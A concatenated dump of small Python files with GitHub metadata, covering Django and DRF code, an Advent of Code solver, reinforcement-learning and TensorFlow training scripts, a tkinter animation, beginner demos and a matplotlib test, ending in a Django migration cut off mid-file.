d1ca88ef2256683e0ef51f12c0b6ec747fdda24c
|
refs/heads/master
| 2021-08-24T01:10:51.920406 | 2017-10-26T15:53:22 | 2017-10-26T15:53:22 | 104,641,211 | 0 | 0 | null | 2017-11-16T06:15:53 | 2017-09-24T12:11:28 |
Python
|
UTF-8
|
Python
| false | false | 290 |
py
|
from rest_framework import permissions
class IsOwner(permissions.BasePermission):
    """Allow read/write access only to authenticated users with an owner.

    Permission is granted when the requesting user is authenticated and
    its ``owner`` relation is non-null; everyone else is denied.
    """

    def has_permission(self, request, view):
        # The original implementation fell through and implicitly returned
        # None on the "deny" path. DRF treats None as falsy, so behavior
        # was correct, but an explicit bool is clearer and matches the
        # BasePermission contract.
        return bool(request.user.is_authenticated
                    and request.user.owner is not None)
|
[
"[email protected]"
] | |
b99ab818fca8289648830abc2a851b6e7323a5e5
|
2e60017779c5c286629ab5a3a7aeb27a6b19a60b
|
/python/2017day19part2.py
|
7f09c5b24ce6b8bf021a566185e157549778341b
|
[] |
no_license
|
jamesjiang52/10000-Lines-of-Code
|
f8c7cb4b8d5e441693f3e0f6919731ce4680f60d
|
3b6c20b288bad1de5390ad672c73272d98e93ae0
|
refs/heads/master
| 2020-03-15T03:50:38.104917 | 2018-05-07T04:41:52 | 2018-05-07T04:41:52 | 131,952,232 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,680 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 19 13:21:23 2017
@author: James Jiang

Advent of Code 2017, day 19 part 2: follow the single routing path drawn
in Data.txt (characters '|', '-', '+', letters, and spaces) and count how
many steps are taken before the path ends.
"""
# Load the diagram as a grid (list of lists) of characters.
all_lines = [line.rstrip('\n') for line in open('Data.txt')]
all_lines_chars = []
for i in range(len(all_lines)):
    chars = [j for j in all_lines[i]]
    all_lines_chars.append(chars)
# Current position: index_all is the row, index_list is the column.
index_list = 0
index_all = 0
# The path enters through the '|' somewhere in the first row.
for i in range(len(all_lines_chars[0])):
    if all_lines_chars[0][i] == '|':
        index_list = i
mode = 'down'  # current travel direction
total = 0      # step counter (the puzzle answer)
while True:
    # Walking onto a space means the path has ended.
    if all_lines_chars[index_all][index_list] == ' ':
        break
    if all_lines_chars[index_all][index_list] == '+':
        # '+' is a corner: turn perpendicular to the current direction.
        # k counts viable turns; k == 0 means a dead end, so stop.
        k = 0
        if (mode == 'down') or (mode == 'up'):
            if index_list != 0:
                if all_lines_chars[index_all][index_list - 1] != ' ':
                    mode = 'left'
                    k += 1
            if index_list != len(all_lines_chars[index_all]) - 1:
                if all_lines_chars[index_all][index_list + 1] != ' ':
                    mode = 'right'
                    k += 1
        elif (mode == 'left') or (mode == 'right'):
            if index_all != 0:
                if all_lines_chars[index_all - 1][index_list] != ' ':
                    mode = 'up'
                    k += 1
            if index_all != len(all_lines_chars) - 1:
                if all_lines_chars[index_all + 1][index_list] != ' ':
                    mode = 'down'
                    k += 1
        if k == 0:
            break
    # Advance one cell in the current direction and count the step.
    if mode == 'down':
        index_all += 1
    elif mode == 'up':
        index_all -= 1
    elif mode == 'left':
        index_list -= 1
    elif mode == 'right':
        index_list += 1
    total += 1
print(total)
|
[
"[email protected]"
] | |
a1912ffe7b983cce6c3ec5119d89a01a0a747635
|
fd02e8924ba325f2a62bbf97e460740a65559c74
|
/PythonStart/0722Python/循环.py
|
6e97b5c0cfd955e8823bf5ef1a968b1dc63d9ef4
|
[] |
no_license
|
ShiJingChao/Python-
|
51ee62f7f39e0d570bdd853794c028020ca2dbc2
|
26bc75c1981a1ffe1b554068c3d78455392cc7b2
|
refs/heads/master
| 2020-07-08T00:05:16.532383 | 2019-10-14T15:19:49 | 2019-10-14T15:19:49 | 203,512,684 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 199 |
py
|
# Demonstrate bitwise AND between integers written in decimal and
# binary notation.
a = 1100
b = 2255
print(a & b)

# 0b100011001111 equals 2255, so this AND prints the same value again.
c = 0b100011001111
print(a & c)
|
[
"[email protected]"
] | |
c7e32b7956006589585393f647556ed9c81dfb10
|
7f25740b1ef47edc24db1a3618b399959b073fe1
|
/1105_08_closer.py
|
60b915e8ee1fc7296456e8dbffab48f45dbbce39
|
[] |
no_license
|
pjh9362/PyProject
|
b2d0aa5f8cfbf2abbd16232f2b55859be50446dc
|
076d31e0055999c1f60767a9d60e122fb1fc913e
|
refs/heads/main
| 2023-01-09T12:12:06.913295 | 2020-11-07T15:32:03 | 2020-11-07T15:32:03 | 306,814,117 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 335 |
py
|
'''
x = 10  # global variable
def foo():
    print(x)  # prints the global variable
foo()
print(x)  # prints the global variable
'''
def foo():
    x = 10  # foo's local variable
    print(x)  # print foo's local variable
foo()
print(x)  # Error (intentional): foo's local x is not visible at module scope
|
[
"[email protected]"
] | |
96d43d8fa24fe2bf0141da26ab1de903a5a6164a
|
6d3c865ce6d9c416d8d11e91d6571a5154b036cf
|
/js_vacancies/apps.py
|
c28e61b96619b705fa4509492f9bf1a51fea5e6d
|
[] |
no_license
|
compoundpartners/js-vacancies
|
2cc94c842df980be177c6fa64b3879b5dcc50bbc
|
175d9f3673c7b002db5c0ea550bb0f29638b7cbb
|
refs/heads/master
| 2021-07-17T05:41:29.800636 | 2020-07-07T14:25:28 | 2020-07-07T14:25:28 | 178,962,329 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 152 |
py
|
# -*- coding: utf-8 -*-
from django.apps import AppConfig
class Vacancies(AppConfig):
    """Django application configuration for the ``js_vacancies`` app."""
    name = 'js_vacancies'
    verbose_name = 'Vacancies'
|
[
"[email protected]"
] | |
4f596c420101e3d0cb7db56aec280d763311ef13
|
6f04a6ef99c581ed2f0519c897f254a7b63fb61d
|
/rastervision/data/vector_source/default.py
|
3946d67b4fa693f28e9a6590c44f1eadb29e48b8
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
dgketchum/raster-vision
|
18030c9a8bfe99386aa95adbf8e3ec51d204947f
|
fe74bef30daa5821023946576b00c584ddc56de8
|
refs/heads/master
| 2020-08-30T13:56:08.598240 | 2019-11-03T17:38:33 | 2019-11-03T17:38:33 | 218,400,435 | 3 | 1 |
NOASSERTION
| 2019-10-29T23:09:57 | 2019-10-29T23:09:57 | null |
UTF-8
|
Python
| false | false | 1,230 |
py
|
from abc import (ABC, abstractmethod)
import os
import rastervision as rv
class VectorSourceDefaultProvider(ABC):
    """Abstract interface mapping a URI string to a default VectorSource.

    Concrete subclasses implement both methods as @staticmethods:
    ``handles`` decides whether a URI belongs to this provider, and
    ``construct`` builds the matching VectorSourceConfig.
    """

    @staticmethod
    @abstractmethod
    def handles(s):
        """Returns True if this provider is a default for this string"""
        pass

    # @staticmethod added for consistency: ``handles`` above and every
    # subclass override declare it; the original omitted it here.
    @staticmethod
    @abstractmethod
    def construct(s):
        """Constructs a default VectorSource based on the
        string.
        """
        pass
class GeoJSONVectorSourceDefaultProvider(VectorSourceDefaultProvider):
    """Default provider that recognizes GeoJSON files by extension."""

    @staticmethod
    def handles(uri):
        """Return True when *uri* has a .json/.geojson extension."""
        _, ext = os.path.splitext(uri)
        return ext.lower() in ('.json', '.geojson')

    @staticmethod
    def construct(uri):
        """Build a GeoJSON VectorSourceConfig pointing at *uri*."""
        builder = rv.VectorSourceConfig.builder(rv.GEOJSON_SOURCE)
        return builder.with_uri(uri).build()
class VectorTileVectorSourceDefaultProvider(VectorSourceDefaultProvider):
    """Default provider that recognizes vector-tile files by extension."""

    @staticmethod
    def handles(uri):
        """Return True when *uri* has a .pbf/.mvt extension."""
        _, ext = os.path.splitext(uri)
        return ext.lower() in ('.pbf', '.mvt')

    @staticmethod
    def construct(uri):
        """Build a vector-tile VectorSourceConfig pointing at *uri*."""
        builder = rv.VectorSourceConfig.builder(rv.VECTOR_TILE_SOURCE)
        return builder.with_uri(uri).build()
|
[
"[email protected]"
] | |
e33911f4ff39e954282be6c971e468995f91606c
|
0d32e3819606c3fb6820d0cd5f5097db3b0d3dd4
|
/HW3/sarsa_mountain_car.py
|
0d4789ce9c45fd1092146fe290050525440869d0
|
[] |
no_license
|
IanCBrown/COMP5600
|
e8e06b2a8e3bde0acc6897adb2396a57a2811f0a
|
ef454c009d6fd5eec50ceec5a8283a7c6d81d097
|
refs/heads/master
| 2020-08-02T13:20:41.024681 | 2019-12-09T03:53:37 | 2019-12-09T03:53:37 | 211,366,293 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,189 |
py
|
import math
import numpy as np
import matplotlib
matplotlib.use("TkAgg")
from matplotlib import pyplot as plt
import gym
from gym import spaces
from gym.utils import seeding
# Resources:
# https://en.wikipedia.org/wiki/Mountain_car_problem
# https://towardsdatascience.com/getting-started-with-reinforcement-learning-and-open-ai-gym-c289aca874f
# https://towardsdatascience.com/reinforcement-learning-temporal-difference-sarsa-q-learning-expected-sarsa-on-python-9fecfda7467e
def epsilon_greedy(Q, state, action_space, epsilon):
    """Pick an action: greedy with probability (1 - epsilon), else random.

    Q is indexed as Q[row, col, action]; ``state`` supplies (row, col).
    """
    exploit = np.random.rand() < 1 - epsilon
    if exploit:
        # Greedy: best-valued action for this discretized state.
        return np.argmax(Q[state[0], state[1]])
    # Explore: uniform over [0, action_space).
    return np.random.randint(0, action_space)
def sarsa(learning_rate, discount, epsilon, min_epsilon, episodes):
    """Train on Gym's MountainCar-v0 with a tabular TD update.

    The continuous (position, velocity) observation is discretized onto
    a grid (x10 / x100 scaling) to index the Q table. Epsilon decays
    linearly from ``epsilon`` to ``min_epsilon`` over ``episodes``.

    Returns:
        (avg_reward_list, var_list): per-recording-interval mean and
        variance of episode rewards.
    """
    # initialize environment
    env = gym.make("MountainCar-v0")
    env.reset()
    # Grid dimensions for the discretized state space.
    states = (env.observation_space.high - env.observation_space.low)*np.array([10,100])
    states = np.round(states, 0).astype(int) + 1
    # Q(s,a), randomly initialized in [-1, 1)
    Q_table = np.random.uniform(low = -1, high = 1, size = (states[0], states[1], env.action_space.n))
    reward_list = []
    var_list = []
    avg_reward_list = []
    # reduce epsilon linearly as time increases
    decay = (epsilon - min_epsilon)/episodes
    # main training loop
    for i in range(episodes):
        finished = False
        total_reward = 0
        reward = 0
        state = env.reset()
        # Discretize the initial observation.
        state_adj = (state - env.observation_space.low)*np.array([10,100])
        state_adj = np.round(state_adj, 0).astype(int)
        while not finished:
            # render last N episodes
            # comment out to see plots
            # if i >= episodes - 1:
            #    env.render()
            # epsilon-greedy action selection
            action = epsilon_greedy(Q_table, state_adj, env.action_space.n, epsilon)
            next_state, reward, finished, info = env.step(action)
            # Discretize the successor state.
            next_state_adj = (next_state - env.observation_space.low)*np.array([10,100])
            next_state_adj = np.round(next_state_adj, 0).astype(int)
            if finished and next_state[0] >= 0.5: # reached the goal position
                # Terminal goal state: store the raw reward.
                Q_table[state_adj[0], state_adj[1], action] = reward
            else:
                # TD update toward reward + discounted max of next state.
                update = learning_rate * (reward + discount * np.max(Q_table[next_state_adj[0],next_state_adj[1]])
                            - Q_table[state_adj[0], state_adj[1], action])
                # update Q table
                Q_table[state_adj[0], state_adj[1], action] += update
            total_reward += reward
            state_adj = next_state_adj
        # decay epsilon if still greater than min_epsilon
        if epsilon > min_epsilon:
            epsilon -= decay
        reward_list.append(total_reward)
        # choose how often to record data
        # recording every data point will make the plots crowded
        # 10 and 100 work well.
        recording_interval = 100
        if i % recording_interval == 0:
            avg_reward = np.mean(reward_list)
            var = np.var(reward_list)
            var_list.append(var)
            avg_reward_list.append(avg_reward)
            reward_list = []
    env.close()
    return (avg_reward_list, var_list)
# Adjust these parameters as needed
number_of_episodes = 2500  # training episodes per run
learning_rate = 0.1        # TD update step size (alpha)
gamma = 0.9                # discount factor
epsilon = 0.8              # initial exploration rate
min_epsilon = 0            # exploration floor after linear decay
def single_run():
    """
    Run the algorithm once and display reward/variance plots.
    """
    avg_reward, variance = sarsa(learning_rate, gamma, epsilon, min_epsilon,
                                 number_of_episodes)
    reward_x = 100 * (np.arange(len(avg_reward)) + 1)
    variance_x = 100 * (np.arange(len(variance)) + 1)

    def _new_figure(name, ylabel):
        # Each plot gets its own window titled after its contents.
        plt.figure(name)
        plt.title(name)
        plt.xlabel("Episodes")
        plt.ylabel(ylabel)

    _new_figure("Average Reward vs. Episodes", "Average Reward")
    plt.plot(reward_x, avg_reward, color='blue')

    _new_figure("Variance vs. Episodes", "Variance")
    plt.plot(variance_x, variance, color='orange')

    _new_figure("Average Reward w/ Variance vs. Episodes",
                "Average Reward w/ Variance")
    plt.errorbar(reward_x, avg_reward, variance, linestyle='None',
                 marker='^', ecolor="orange")

    plt.show()
def multi_run(N):
    """
    Run the algorithm N times and save run-averaged reward/variance plots.

    @param N - number of times to test (e.g. 20)
    """
    all_rewards = []
    all_variances = []
    for _ in range(N):
        avg_reward, var = sarsa(learning_rate, gamma, epsilon, min_epsilon,
                                number_of_episodes)
        all_rewards.append(avg_reward)
        all_variances.append(var)

    # Group values by recording interval across runs, then average
    # each interval over the N runs.
    reward_to_plot = [np.mean(interval) for interval in zip(*all_rewards)]
    var_to_plot = [np.mean(interval) for interval in zip(*all_variances)]

    episodes1 = 100 * (np.arange(len(avg_reward)) + 1)
    episodes2 = 100 * (np.arange(len(var)) + 1)

    plt.figure("Average Reward vs. Episodes")
    plt.title("Average Reward vs. Episodes")
    plt.xlabel("Episodes")
    plt.ylabel("Average Reward")
    plt.plot(episodes1, reward_to_plot, color='blue')
    plt.savefig("sarsa_results/Average_Reward_vs_Episodes.png")

    plt.figure("Variance vs. Episodes")
    plt.title("Variance vs. Episodes")
    plt.xlabel("Episodes")
    plt.ylabel("Variance")
    plt.plot(episodes2, var_to_plot, color='orange')
    plt.savefig("sarsa_results/Variance_vs_Episodes.png")

    plt.figure("Average Reward w/ Variance vs. Episodes")
    plt.title("Average Reward w/ Variance vs. Episodes")
    plt.xlabel("Episodes")
    plt.ylabel("Average Reward w/ Variance")
    plt.errorbar(episodes1, reward_to_plot, var_to_plot, linestyle='None',
                 marker='^', ecolor="orange")
    plt.savefig("sarsa_results/Average_Reward_and_Variance_vs_Episodes.png")
# Choose between a single diagnostic run and an averaged multi-run.
# single_run()
multi_run(20)  # average results over 20 independent training runs
|
[
"[email protected]"
] | |
e45a01330d9e90fa76dea147d9fc060e42d10c77
|
9044b440bed2b8407ed9e04f7fb9d3d2a7593136
|
/vision/classification/slim/image_models/finetune/train.py
|
b15420b6bf71de14a447e1b40980949e6c95830b
|
[] |
no_license
|
xuzhezhaozhao/ai
|
d4264f5d15cc5fa514e81adb06eb83731a0ca818
|
925cbd31ad79f8827e2c3c706f4b51910f9f85d1
|
refs/heads/master
| 2022-01-22T07:04:29.082590 | 2022-01-17T06:49:39 | 2022-01-17T06:49:39 | 136,691,051 | 5 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,638 |
py
|
#! /usr/bin/env python
# -*- coding=utf8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import input_data
import hook
import build_model_fn
def build_estimator(opts):
    """Build estimator.

    Checkpoint cadence can be specified in seconds, steps, or epochs;
    epochs are converted to steps using the training-set size. Setting
    both steps and epochs is rejected as ambiguous.
    """
    num_samples_per_epoch = len(input_data.read_txt_file(
        opts.train_data_path, False))
    save_checkpoints_secs = None
    if opts.save_checkpoints_secs > 0:
        save_checkpoints_secs = opts.save_checkpoints_secs
    save_checkpoints_steps = None
    if opts.save_checkpoints_steps > 0 and opts.save_checkpoints_epoches > 0:
        raise ValueError("save_checkpoints_steps and save_checkpoints_epoches "
                         "should not be both set.")
    if opts.save_checkpoints_steps > 0:
        save_checkpoints_steps = opts.save_checkpoints_steps
    if opts.save_checkpoints_epoches > 0:
        # Convert the epoch interval to an equivalent number of steps.
        save_checkpoints_steps = int(opts.save_checkpoints_epoches *
                                     num_samples_per_epoch / opts.batch_size)
    config_keys = {}
    config_keys['model_dir'] = opts.model_dir
    config_keys['tf_random_seed'] = None
    config_keys['save_summary_steps'] = opts.save_summary_steps
    config_keys['save_checkpoints_secs'] = save_checkpoints_secs
    config_keys['save_checkpoints_steps'] = save_checkpoints_steps
    config_keys['session_config'] = None
    config_keys['keep_checkpoint_max'] = opts.keep_checkpoint_max
    # Very large value: effectively disables time-based checkpoint keeping.
    config_keys['keep_checkpoint_every_n_hours'] = 10000
    config_keys['log_step_count_steps'] = opts.log_step_count_steps
    estimator_keys = {}
    estimator_keys['model_fn'] = build_model_fn.model_fn
    # num_samples_per_epoch is passed through so model_fn can derive
    # schedules (e.g. learning-rate decay) from the dataset size.
    estimator_keys['params'] = {
        'opts': opts,
        'num_samples_per_epoch': num_samples_per_epoch
    }
    config = tf.estimator.RunConfig(**config_keys)
    estimator_keys['config'] = config
    estimator = tf.estimator.Estimator(**estimator_keys)
    return estimator
def create_hooks(opts):
    """Create profile hooks (timeline metadata + ProfilerHook).

    Returns an empty list unless opts.use_profile_hook is set.
    """
    save_steps = opts.profile_steps
    meta_hook = hook.MetadataHook(save_steps=save_steps,
                                  output_dir=opts.model_dir)
    profile_hook = tf.train.ProfilerHook(save_steps=save_steps,
                                         output_dir=opts.model_dir,
                                         show_dataflow=True,
                                         show_memory=True)
    if not opts.use_profile_hook:
        return []
    return [meta_hook, profile_hook]
def train_and_eval_in_local_mode(opts, estimator, hooks):
    """Train and eval model in local mode.

    Derives the step budget from the epoch count (unless
    opts.max_train_steps overrides it), attaches an early-stopping hook
    keyed on eval loss, and runs tf.estimator.train_and_evaluate.
    """
    build_train_input_fn = input_data.build_train_input_fn(
        opts, opts.train_data_path)
    build_eval_input_fn = input_data.build_eval_input_fn(
        opts, opts.eval_data_path)
    num_samples_per_epoch = len(
        input_data.read_txt_file(opts.train_data_path, False))
    num_steps_per_epoch = num_samples_per_epoch / opts.batch_size
    # An explicit max_train_steps wins over the epoch-derived budget.
    if opts.max_train_steps > 0:
        max_steps = opts.max_train_steps
    else:
        max_steps = opts.epoch*num_steps_per_epoch
    tf.logging.info('max_steps = {}'.format(max_steps))
    # Early-stopping thresholds are configured in epochs; convert to steps.
    max_steps_without_decrease = int(
        opts.max_epoches_without_decrease*num_steps_per_epoch)
    early_stopping_min_steps = int(
        opts.early_stopping_min_epoches*num_steps_per_epoch)
    run_every_steps = int(
        opts.early_stopping_run_every_epoches*num_steps_per_epoch)
    early_stopping_hook = tf.contrib.estimator.stop_if_no_decrease_hook(
        estimator, "loss",
        max_steps_without_decrease=max_steps_without_decrease,
        run_every_secs=None,
        min_steps=early_stopping_min_steps,
        run_every_steps=run_every_steps)
    hooks.append(early_stopping_hook)
    train_spec = tf.estimator.TrainSpec(
        input_fn=build_train_input_fn,
        max_steps=max_steps,
        hooks=hooks)
    eval_spec = tf.estimator.EvalSpec(
        input_fn=build_eval_input_fn,
        steps=None,  # evaluate on the full eval set
        name='eval',
        start_delay_secs=3,
        throttle_secs=opts.throttle_secs)
    result = tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)
    return result
def export_model_in_local_mode(opts, estimator):
    """Export the trained estimator as a SavedModel."""
    tf.logging.info("Beginning export model ...")
    serving_fn = input_data.build_serving_input_fn(opts)
    estimator.export_savedmodel(
        opts.export_model_dir,
        serving_input_receiver_fn=serving_fn)
    tf.logging.info("Export model OK")
def train(opts, export=False):
    """Train model.

    Builds the estimator and profiling hooks, runs local
    train-and-evaluate, and optionally exports a SavedModel afterwards.

    Args:
        opts: parsed options namespace.
        export: when True, export the trained model after training.

    Returns:
        The result of tf.estimator.train_and_evaluate.
    """
    estimator = build_estimator(opts)
    hooks = create_hooks(opts)
    result = train_and_eval_in_local_mode(opts, estimator, hooks)
    if export:
        export_model_in_local_mode(opts, estimator)
    return result
def predict(opts):
    """Run batch prediction, writing "<input line> <score>" per example.

    Scores examples from opts.predict_data_path using the given (or
    latest) checkpoint and writes one line per input to
    opts.predict_output. Assumes predictions are yielded in the same
    order as the input file's lines.
    """
    tf.logging.info("Begin predict ...")
    estimator = build_estimator(opts)
    build_predict_input_fn = input_data.build_predict_input_fn(
        opts, opts.predict_data_path)
    checkpoint_path = opts.predict_checkpoint_path
    if tf.gfile.IsDirectory(opts.predict_checkpoint_path):
        # A directory was given: resolve it to its newest checkpoint.
        checkpoint_path = tf.train.latest_checkpoint(checkpoint_path)
    results = estimator.predict(
        input_fn=build_predict_input_fn,
        checkpoint_path=checkpoint_path,
        yield_single_examples=True)
    with open(opts.predict_output, 'w') as fout, \
        open(opts.predict_data_path, 'r') as fin:
        for result in results:
            # Pair each prediction with its source line (order-dependent).
            src = fin.readline().strip()
            fout.write(src + ' ')
            # result['score'][1] — presumably the positive-class
            # probability of a binary classifier; confirm with model_fn.
            fout.write(str(result['score'][1]) + '\n')
    tf.logging.info("Predict done")
|
[
"[email protected]"
] | |
b2e0391d750efe19f614deb8c2bd1631da82841d
|
5916383e8d3df886edd20ac00ce9706a78078f56
|
/飞机大战/v2/world.py
|
9e05cd9b131661fae9882e44e040079213137409
|
[] |
no_license
|
sczhan/wode
|
556154e8ccaa9192ea257bc88df3c5e4b268f88e
|
af4c721d0cedfdd2fe01dd681539724d1d64c378
|
refs/heads/master
| 2021-07-06T22:26:34.465708 | 2020-09-04T18:56:38 | 2020-09-04T18:56:38 | 181,295,279 | 1 | 0 | null | 2019-09-09T16:30:00 | 2019-04-14T10:53:57 |
Python
|
UTF-8
|
Python
| false | false | 1,656 |
py
|
import tkinter
"""
蜜蜂从上向下运动
可以通过键盘左右控制
"""
step = 0 # 计算器,计算一个走了多少步
direction = (1, 1)
x = 0
y = 10
def set_right(e):
"""
:param e:
:return:
"""
global x
x += 20
def set_left(e):
"""
:param e:
:return:
"""
global x
x -= 20
root_window = tkinter.Tk()
root_window.title("world")
root_window.bind("<Key-Left>", set_left)
root_window.bind("<Key-Right>", set_right)
# 设置不能更改宽,高
root_window.resizable(width=False, height=False)
window_canvas = tkinter.Canvas(root_window, width=450, height=600)
window_canvas.pack()
def main():
    """Build the start screen, draw the sprites, and run the event loop."""
    # Draw the background; `tags` lets later code address canvas items.
    bg_img_name = "../img/background.gif"
    bg_img = tkinter.PhotoImage(file=bg_img_name)
    window_canvas.create_image(480/2, 600/2, anchor=tkinter.CENTER, image=bg_img, tags="bg")
    # Draw the bee sprite.
    bee = "../img/bee.gif"
    bee_img = tkinter.PhotoImage(file=bee)
    window_canvas.create_image(150, 180/2, anchor=tkinter.CENTER, image=bee_img, tags="bee")
    # Draw the small plane sprite.
    sp = "../img/smallplane.gif"
    sp_img = tkinter.PhotoImage(file=sp)
    window_canvas.create_image(50, 100/2, anchor=tkinter.CENTER, image=sp_img, tags="sp")
    # Start the animation loop for the sprites.
    ap_move()
    tkinter.mainloop()
def ap_move():
    """Move the plane and bee sprites one step, then reschedule itself.

    Runs every 1000 ms via Canvas.after; uses the module-level x/y
    offsets, which the arrow-key handlers adjust.

    :return: None
    """
    global step
    global x
    global y
    y += 20
    print(x, y)
    window_canvas.move("sp", x, y)
    window_canvas.move("bee", x, y)
    step += 1
    # Schedule the next movement tick.
    window_canvas.after(1000, ap_move)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
944dd21d731631667b2b61b7df4bbb9c9272ea4d
|
f0d6efe035d4c2ed1ea6bb6d1d5a613b8630a025
|
/lib/jsonrpc/flexjsonrpc/__init__.py
|
53ece394443611d381a3d2a3a98aed5682669d8f
|
[
"BSD-2-Clause-Views",
"BSD-3-Clause"
] |
permissive
|
bemoss/BEMOSS3.5
|
d24c1c5587e5081092cc97250db45645363da4e4
|
75a09bc5d0a2ec0ae994ac900a93dc027b527860
|
refs/heads/master
| 2021-08-15T23:05:40.661118 | 2021-03-29T20:28:14 | 2021-03-29T20:28:14 | 91,000,462 | 81 | 38 |
NOASSERTION
| 2021-03-29T20:29:54 | 2017-05-11T16:25:43 |
Python
|
UTF-8
|
Python
| false | false | 2,921 |
py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2013, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
#}}}
from core import *
|
[
"[email protected]"
] | |
de387f75b9153d81353f74324c32842675a55b8c
|
888e79392cb660be5799cc5bd25d76bcfa9e2e2c
|
/doctorus/doctorus/doctype/actividad/test_actividad.py
|
64e868e23ae78de54542b56cedaaeb515a1bd9a4
|
[
"MIT"
] |
permissive
|
Nirchains/doctorus
|
269eadee5754612c521d1c6193d5fe7bbfdb3b8a
|
38d39270742dfdae6597a06713952df01a2c3e9d
|
refs/heads/master
| 2020-03-17T07:09:30.046005 | 2019-05-08T06:51:50 | 2019-05-08T06:51:50 | 133,386,354 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 216 |
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018, HISPALIS DIGITAL and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestActividad(unittest.TestCase):
    """Placeholder test case for the Actividad doctype; no tests yet."""
    pass
|
[
"[email protected]"
] | |
b2595d9eccaf22427e7e16962a002d011843363f
|
c2df9e04adec78e789d1fbdb0711c45e5b9263a7
|
/venv/Lib/site-packages/matplotlib/tests/test_texmanager.py
|
d24f7dc27a562a23298a3978078f1dbbcabf9e93
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
AdarshSai/Final_Project
|
433009a2f416e894ee3be85cd9317cb8e8df5516
|
f966834ca72dd232102ed500ef47ef2b3bdbed5b
|
refs/heads/main
| 2023-01-23T12:21:41.342074 | 2020-11-19T22:24:15 | 2020-11-19T22:24:15 | 308,898,012 | 0 | 1 |
MIT
| 2020-11-19T22:24:17 | 2020-10-31T14:19:58 |
Python
|
UTF-8
|
Python
| false | false | 475 |
py
|
import matplotlib.pyplot as plt
from matplotlib.texmanager import TexManager
def test_fontconfig_preamble():
    """
    Test that the preamble is included in _fontconfig
    """
    plt.rcParams['text.usetex'] = True

    # Font config without a custom preamble...
    baseline = TexManager().get_font_config()

    # ...must change once a preamble is configured.
    plt.rcParams['text.latex.preamble'] = '\\usepackage{txfonts}'
    with_preamble = TexManager().get_font_config()

    assert baseline != with_preamble
|
[
"[email protected]"
] | |
3b600461905bbc4961263bfe2745dd295cc11579
|
d9296d3b420d8f5c1aeca094d00dd6bc38a3d57d
|
/read_statistics/migrations/0001_initial.py
|
ea8634dbdab68cbb44d0ce86241b1fce182ee74d
|
[] |
no_license
|
Anthony88888/mysite
|
57f5f40530886b12cf1364c10c6206983b022c6c
|
7130715ef3acac054b96fa22dcf19fec1f31e019
|
refs/heads/master
| 2023-01-09T12:15:11.720225 | 2020-10-25T14:48:35 | 2020-10-25T14:48:35 | 305,168,092 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 776 |
py
|
# Generated by Django 2.0.13 on 2020-10-06 16:27
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates the ReadNum model.

    ReadNum stores a read counter attached to an arbitrary model
    instance via Django's contenttypes pattern (content_type + object_id).
    """

    initial = True

    dependencies = [
        ('contenttypes', '0002_remove_content_type_name'),
    ]

    operations = [
        migrations.CreateModel(
            name='ReadNum',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('read_num', models.IntegerField(default=0)),
                ('object_id', models.PositiveIntegerField()),
